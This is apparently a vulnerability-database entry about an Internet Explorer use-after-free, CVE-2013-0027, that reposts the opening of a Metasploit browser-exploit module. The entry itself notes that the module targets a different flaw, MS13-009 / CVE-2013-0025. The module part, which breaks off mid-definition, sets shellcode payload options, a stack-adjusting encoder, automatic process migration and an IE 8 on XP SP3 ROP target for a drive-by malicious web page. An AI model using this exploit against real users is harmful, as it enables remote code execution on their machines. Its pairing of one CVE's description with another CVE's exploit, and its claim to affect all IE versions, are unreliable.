High-risk vulnerability CVE-2013-0027 exploit (EXP), affecting all versions of IE

2013-04-22T00:00:00
ID MYHACK58:62201338437
Type myhack58
Reporter Anonymous
Modified 2013-04-22T00:00:00

Description

Microsoft Internet Explorer has a use-after-free error in its handling of CPasteComma. An attacker can construct a malicious web page and entice a user to open it, which allows arbitrary code to be executed in the context of the application. The CVE number is CVE-2013-0027. The affected versions are as follows:

Microsoft Internet Explorer 10

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6

Metasploit has released a corresponding exploit module, as follows. Note that the module's own references cite CVE-2013-0025 and MS13-009 rather than CVE-2013-0027.

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a CParaElement node is released but a reference is still kept
        in CDoc. This memory is reused when a CDoc relayout is performed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0025' ],
          [ 'MSB', 'MS13-009' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'Space'          => 920,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))

    register_options(
